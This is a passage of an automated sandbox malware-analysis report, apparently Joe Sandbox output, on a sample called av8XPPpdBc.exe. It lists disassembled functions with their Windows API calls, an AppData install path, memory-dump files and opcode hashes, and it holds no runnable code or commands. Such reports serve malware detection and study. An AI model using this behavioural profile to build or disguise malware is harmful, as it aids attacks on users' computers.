                                                                                                                                                                                        • Part of subcall function 00406805: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\av8XPPpdBc.exe",76233420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00406868
                                                                                                                                                                                        • Part of subcall function 00406805: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406877
                                                                                                                                                                                        • Part of subcall function 00406805: CharNextW.USER32(?,"C:\Users\user\Desktop\av8XPPpdBc.exe",76233420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040687C
                                                                                                                                                                                        • Part of subcall function 00406805: CharPrevW.USER32(?,?,76233420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040688F
                                                                                                                                                                                      • GetDiskFreeSpaceW.KERNEL32(0042AA38,?,?,0000040F,?,0042AA38,0042AA38,?,00000001,0042AA38,?,?,000003FB,?), ref: 00404C0F
                                                                                                                                                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404C2A
                                                                                                                                                                                        • Part of subcall function 00404D83: lstrlenW.KERNEL32(0042CA68,0042CA68,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E24
                                                                                                                                                                                        • Part of subcall function 00404D83: wsprintfW.USER32 ref: 00404E2D
                                                                                                                                                                                        • Part of subcall function 00404D83: SetDlgItemTextW.USER32(?,0042CA68), ref: 00404E40
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2182934317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2182971929.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183191947.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                      • String ID: : Completed$A$C:\Users\user\AppData\Roaming\erstatningsgraden
                                                                                                                                                                                      • API String ID: 2624150263-3870413507
                                                                                                                                                                                      • Opcode ID: aab1ff152b07609d5ccd452d97b16b322b3ddb3b1e57e49f69f3ed37cd316d4d
                                                                                                                                                                                      • Instruction ID: 8a45afd3ee22384d80319c7ed67abe130e578f1d2b392c1e8909742cb30e522b
                                                                                                                                                                                      • Opcode Fuzzy Hash: aab1ff152b07609d5ccd452d97b16b322b3ddb3b1e57e49f69f3ed37cd316d4d
                                                                                                                                                                                      • Instruction Fuzzy Hash: FCA192B1900208ABDB11EFA5DD45BAFB7B8EF84314F11803BF611B62D1D77C9A418B69
                                                                                                                                                                                      Function 004021AF Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CoCreateInstance.OLE32(004085E8,?,00000001,004085D8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040222E
                                                                                                                                                                                      Strings
                                                                                                                                                                                      • C:\Users\user\AppData\Roaming\erstatningsgraden\Observatorers, xrefs: 0040226E
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2182934317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2182971929.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183191947.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CreateInstance
                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Roaming\erstatningsgraden\Observatorers
                                                                                                                                                                                      • API String ID: 542301482-4212467774
                                                                                                                                                                                      • Opcode ID: 54fcaebf65a6d80a769d2ffe25eeb1568fba929b3fba522b5b89cb6b807999ae
                                                                                                                                                                                      • Instruction ID: f0c409d0c9855dc16f3492d495f607d4fcaf843261c47ee8c1995525671fe781
                                                                                                                                                                                      • Opcode Fuzzy Hash: 54fcaebf65a6d80a769d2ffe25eeb1568fba929b3fba522b5b89cb6b807999ae
                                                                                                                                                                                      • Instruction Fuzzy Hash: 76411471A00208AFCB40DFE4C989EAD7BB5FF48308B20457AF515EB2D1DB799982CB54
                                                                                                                                                                                      Function 00402910 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291F
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2182934317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2182971929.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183191947.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: FileFindFirst
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1974802433-0
                                                                                                                                                                                      • Opcode ID: f7eec81d6910abfa52e209e80917fba1586809f9bcb970d7ef1d97902b1d379f
                                                                                                                                                                                      • Instruction ID: 4f8030157269cd498ea314d5a86e386b0cfb994e1dea9c94a4400a3869289cfc
                                                                                                                                                                                      • Opcode Fuzzy Hash: f7eec81d6910abfa52e209e80917fba1586809f9bcb970d7ef1d97902b1d379f
                                                                                                                                                                                      • Instruction Fuzzy Hash: 17F08C71A04104AAD701EBE4EE499AEB378EF14324F60457BE102F31E0DBB85E159B2A
                                                                                                                                                                                      Function 00406DC6 Relevance: .3, Instructions: 334COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2182934317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2182971929.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183191947.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: ca9fc840679c4677ea5dd763a2b97f011fd48deb17cd4c9d43ec117c62889360
                                                                                                                                                                                      • Instruction ID: a5eb8001d75a17d38d83411349fde439c8a9064fda1b18d7f978e280ae41e255
                                                                                                                                                                                      • Opcode Fuzzy Hash: ca9fc840679c4677ea5dd763a2b97f011fd48deb17cd4c9d43ec117c62889360
                                                                                                                                                                                      • Instruction Fuzzy Hash: ACE19C71A04709DFCB24CF58C880BAABBF1FF45305F15852EE496A72D1E378AA51CB05
                                                                                                                                                                                      Function 0040759D Relevance: .3, Instructions: 300COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2182934317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2182971929.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183191947.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 5db23d3e625216a1972a1fea7a98b9ee98c1df0b240da8e2d6c4f39054d3f9c6
                                                                                                                                                                                      • Instruction ID: e409ec8ffb443055957628c835c79614664982182129ebc37b3e11cb9bcd83e5
                                                                                                                                                                                      • Opcode Fuzzy Hash: 5db23d3e625216a1972a1fea7a98b9ee98c1df0b240da8e2d6c4f39054d3f9c6
                                                                                                                                                                                      • Instruction Fuzzy Hash: ECC14772E04219CBCF18CF68C4905EEBBB2BF98354F25866AD85677380D7346942CF95
                                                                                                                                                                                      Function 00404F43 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetDlgItem.USER32(?,000003F9), ref: 00404F5B
                                                                                                                                                                                      • GetDlgItem.USER32(?,00000408), ref: 00404F66
                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 00404FB0
                                                                                                                                                                                      • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404FC7
                                                                                                                                                                                      • SetWindowLongW.USER32(?,000000FC,00405550), ref: 00404FE0
                                                                                                                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FF4
                                                                                                                                                                                      • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00405006
                                                                                                                                                                                      • SendMessageW.USER32(?,00001109,00000002), ref: 0040501C
                                                                                                                                                                                      • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405028
                                                                                                                                                                                      • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 0040503A
                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 0040503D
                                                                                                                                                                                      • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405068
                                                                                                                                                                                      • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405074
                                                                                                                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040510F
                                                                                                                                                                                      • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040513F
                                                                                                                                                                                        • Part of subcall function 0040450B: SendMessageW.USER32(00000028,?,00000001,00404336), ref: 00404519
                                                                                                                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405153
                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00405181
                                                                                                                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040518F
                                                                                                                                                                                      • ShowWindow.USER32(?,00000005), ref: 0040519F
                                                                                                                                                                                      • SendMessageW.USER32(?,00000419,00000000,?), ref: 0040529A
                                                                                                                                                                                      • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052FF
                                                                                                                                                                                      • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405314
                                                                                                                                                                                      • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405338
                                                                                                                                                                                      • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405358
                                                                                                                                                                                      • ImageList_Destroy.COMCTL32(?), ref: 0040536D
                                                                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 0040537D
                                                                                                                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053F6
                                                                                                                                                                                      • SendMessageW.USER32(?,00001102,?,?), ref: 0040549F
                                                                                                                                                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004054AE
                                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 004054D9
                                                                                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 00405527
                                                                                                                                                                                      • GetDlgItem.USER32(?,000003FE), ref: 00405532
                                                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 00405539
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2182934317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2182971929.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183191947.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                      • String ID: $M$N
                                                                                                                                                                                      • API String ID: 2564846305-813528018
                                                                                                                                                                                      • Opcode ID: 14683326fe5d0e21a3b01d942e888f99a0d9647cceadcd168bf81575faddcc86
                                                                                                                                                                                      • Instruction ID: 91097811874ce85ba3cc7540bcf7dd58db25a3d6f071223140e4d1ec27d7ea12
                                                                                                                                                                                      • Opcode Fuzzy Hash: 14683326fe5d0e21a3b01d942e888f99a0d9647cceadcd168bf81575faddcc86
                                                                                                                                                                                      • Instruction Fuzzy Hash: 6C029C70900608AFDF20DF94DD85AAF7BB5FB85314F10817AE611BA2E1D7798A41CF58
                                                                                                                                                                                      Function 00404695 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404733
                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 00404747
                                                                                                                                                                                      • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404764
                                                                                                                                                                                      • GetSysColor.USER32(?), ref: 00404775
                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404783
                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404791
                                                                                                                                                                                      • lstrlenW.KERNEL32(?), ref: 00404796
                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004047A3
                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004047B8
                                                                                                                                                                                      • GetDlgItem.USER32(?,0000040A), ref: 00404811
                                                                                                                                                                                      • SendMessageW.USER32(00000000), ref: 00404818
                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 00404843
                                                                                                                                                                                      • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404886
                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 00404894
                                                                                                                                                                                      • SetCursor.USER32(00000000), ref: 00404897
                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 004048B0
                                                                                                                                                                                      • SetCursor.USER32(00000000), ref: 004048B3
                                                                                                                                                                                      • SendMessageW.USER32(00000111,00000001,00000000), ref: 004048E2
                                                                                                                                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048F4
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2182934317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2182971929.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183191947.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                                                                                      • String ID: : Completed$N
                                                                                                                                                                                      • API String ID: 3103080414-2140067464
                                                                                                                                                                                      • Opcode ID: 04e13e5971a3aaf2d7c3f6bec99ed017c89c89abbf6057be99a5caf0d4384f9a
                                                                                                                                                                                      • Instruction ID: 3ad42440e7936429012ccc374b67200ab01768f99e4ad58672f49272ac14a637
                                                                                                                                                                                      • Opcode Fuzzy Hash: 04e13e5971a3aaf2d7c3f6bec99ed017c89c89abbf6057be99a5caf0d4384f9a
                                                                                                                                                                                      • Instruction Fuzzy Hash: 2E6181B1900209BFDB10AF60DD85EAA7B69FB84315F00853AFA05B62D0C779A951DF98
                                                                                                                                                                                      Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                      • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                                                      • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                                                      • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                                                                      • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                                                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                                                      • DrawTextW.USER32(00000000,00433700,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                                                      • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2182955052.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2182934317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2182971929.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183010188.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2183191947.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_av8XPPpdBc.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                      • String ID: F
                                                                                                                                                                                      • API String ID: 941294808-1304234792
                                                                                                                                                                                      • Opcode ID: f8b3db801d2c504d9e2de6f85bac4b8fdc05036872983a9c428bf394377a2a15
                                                                                                                                                                                      • Instruction ID: eca0ad76d85821e0a7fbe67f508e5060b260b918cc65b70bf06bca200ae74670
                                                                                                                                                                                      • Opcode Fuzzy Hash: f8b3db801d2c504d9e2de6f85bac4b8fdc05036872983a9c428bf394377a2a15
                                                                                                                                                                                      • Instruction Fuzzy Hash: 2F418B71800209AFCB058FA5DE459AFBFB9FF45314F00802EF591AA1A0C738EA54DFA4
                                                                                                                                                                                      Function 0040619D Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406338,?,?), ref: 004061D8
                                                                                                                                                                                      • GetShortPathNameW.KERNEL32(?,00430108,00000400), ref: 004061E1
                                                                                                                                                                                        • Part of subcall function 00405FAC: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FBC
                                                                                                                                                                                        • Part of subcall function 00405FAC: lstrlenA.KERNEL32(00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FEE
                                                                                                                                                                                      • GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 004061FE
                                                                                                                                                                                      • wsprintfA.USER32 ref: 0040621C
                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,00430908,C0000000,00000004,00430908,?,?,?,?,?), ref: 00406257
                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406266
                                                                                                                                                                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040629E
